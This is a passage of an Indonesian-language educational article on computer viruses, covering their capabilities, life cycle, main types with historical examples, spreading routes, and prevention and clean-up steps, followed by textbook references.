tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)

b.Program virus yang sudah di eksekusi/load ke memori akan langsung

menulari file-file lain dengan cara menumpangi seluruh file/program

yang ada.

4.Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus

menulari suatu file/program. isi dari suatu rutin ini dapat beragam

mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan

untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini

memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,

sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem

operasi. misal:

a.Membuat gambar atau pesan pada monitor

b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari

drive di pc

c.Memanipulasi program/file yang ditulari

d.Merusak program/file

e.Mengacaukan kerja printer , dsb

5.Kemampuan Menyembunyikan diri

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua

pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.

langkah langkah yang biasa dilakukan adalah:

-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan

program lain yang dianggap berguna oleh pemakai.

-Program virus diletakkan pada Boot Record atau track yang jarang

diperhatikan oleh komputer itu sendiri

-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak

berubah ukurannya

-Virus tidak mengubah keterangan waktu suatu file

-dll

D.SIKLUS HIDUP VIRUS

Siklus hidup virus secara umum, melalui 4 tahap:

1. Dormant phase ( Fase Istirahat/Tidur )

Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi

tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya

program lain, dsb. Tidak semua virus melalui fase ini

2. Propagation phase ( Fase Penyebaran )

Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau

ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap

program yang terinfeksi akan menjadi hasil “klonning” virus tersebut

(tergantung cara virus tersebut menginfeksinya)

3. Trigerring phase ( Fase Aktif )

Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa

kondisi seperti pada Dormant phase

4. Execution phase ( Fase Eksekusi )

Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya.

Seperti menghapus file, menampilkan pesan-pesan, dsb

E.JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba

memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran

di dunia cyber.

1.Virus Makro

Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis

dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa

pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila

aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada

komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada

komputer bersistem operasi Mac.

contoh virus:

-variant W97M, misal W97M.Panther

panjang 1234 bytes,

akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.

-WM.Twno.A;TW

panjang 41984 bytes,

akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya

berekstensi *.DOT dan *.DOC

-dll

2.Virus Boot Sector

Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan

dirinya akan memindahkan atau menggantikan boot sector asli dengan program

booting virus. Sehingga saat terjadi booting maka virus akan di load kememori

dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar

(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar

eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain

selain drive c).

contoh virus :

-varian virus wyx

ex: wyx.C(B) menginfeksi boot record dan floopy ;

panjang :520 bytes;

karakteristik : memory resident dan terenkripsi)

-varian V-sign :

menginfeksi : Master boot record ;

panjang 520 bytes;

karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)

-Stoned.june 4th/ bloody!:

menginfeksi : Master boot record dan floopy;

panjang 520 bytes;

karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan

pesan”Bloody!june 4th 1989″ setelah komputer melakukan booting sebanyak 128 kali

3.Stealth Virus

Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal

dengan “Interrupt interceptor” . virus ini berkemampuan untuk mengendalikan

instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya

baik secara penuh ataupun ukurannya .

contoh virus:

-Yankee.XPEH.4928,

menginfeksi file *.COM dan *.EXE ;

panjang 4298 bytes;

karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu

-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth

dimasukkan pula disini), menginfeksi floopy an motherboot record;

panjang 520 bytes;

menetap di memori; ukuran dan virus tersembunyi.

-Vmem(s):

menginfeksi file file *.EXE, *.SYS, dan *.COM ;

panjang fie 3275 bytes;

karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.

-dll

4.Polymorphic Virus

Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu

berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah

strukturnya setiap kali selesai menginfeksi file/program lain.

contoh virus:

-Necropolis A/B,

menginfeksi file *.EXE dan *.COM;

panjang file 1963 bytes;

karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan

dapat berubah ubah struktur

-Nightfall,

menginfeksi file *.EXE;

panjang file 4554 bytes;

karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,

terenkripsidan dapat berubah-ubah struktur

-dll

5.Virus File/Program

Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,

baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi

dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6.Multi Partition Virus

Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya

pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-

file *.EXE dan juga menginfeksi Boot Sector.

F.BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus

computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai

cara, diantaranya:

1.Disket, media storage R/W

Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk

dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya.

Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk

ditumpangi virus dan dijadikan sebagai media penyebaran.

2.Jaringan ( LAN, WAN,dsb)

Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu

virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program

yang mengandung virus.

3.WWW (internet)

Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan

menginfeksi komputer-komputer yang mengaksesnya.

4.Software yang Freeware, Shareware atau bahkan Bajakan

Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di

sebarluaskan baik secara gratis, atau trial version yang tentunya sudah

tertanam virus didalamnya.

5.Attachment pada Email, transferring file

Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment

dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk

berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan

seringkali memiliki ekstensi ganda pada penamaan filenya.

G.PENANGULANGANNYA

1.Langkah-Langkah untuk Pencegahan

Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :

o Gunakan Antivirus yang anda percayai dengan updatean terbaru, tdak

perduli appun merknya asalkan selalu di update, dan nyalakan Auto protect

o Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan,

mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda

bekerja maka prosedur ini dapat dilewatkan.

o Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan

Antivirus anda dengan Firewall, Anti spamming, dsb

2.Langkah-Lagkah Apabila telah Terinfeksi

Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah disket,

jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda

mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable

dari control panel)

o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,

dengan cara:

- Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb

- Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan

berarti vius definition di computer anda tidak memiliki data virus ini,

cobalah update secara manual atau mendownload virus definitionnya untuk

anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya

maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus

updatean terbaru.

o Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan

segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs

-situs yang memberikan informasi perkembangan virus. Hal ini jika antivirus

update-an terbaru anda tidak berhasil memusnahkannya.

o Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat

ulang komputer anda .

REFERENSI

1.[ Stallings, William ],“CRYPTOGRAPHY AND NETWORK SECURITY,principle

and practice: second edition ” ,Prentice-Hall,Inc., New Jersey ,1999

2.[ Salim, IR.Hartojo ],“Virus Komputer, teknik pembuatan & langkah-

langkah penaggulangannya ,Andi OFFSET,Yogyakarta , 1989.

3.[ Amperiyanto, Tri ],“Bermain-main dengan Virus Macro”,Elex Media

Komputindo, Jakarta,2002

4.[ Jayakumar ], “ Viruspaperw.pdf ”, EBOOK version

5.[ y3dips ],“pernak pernik Virus”,http://ezine.echo.or.id,Jakarta,2003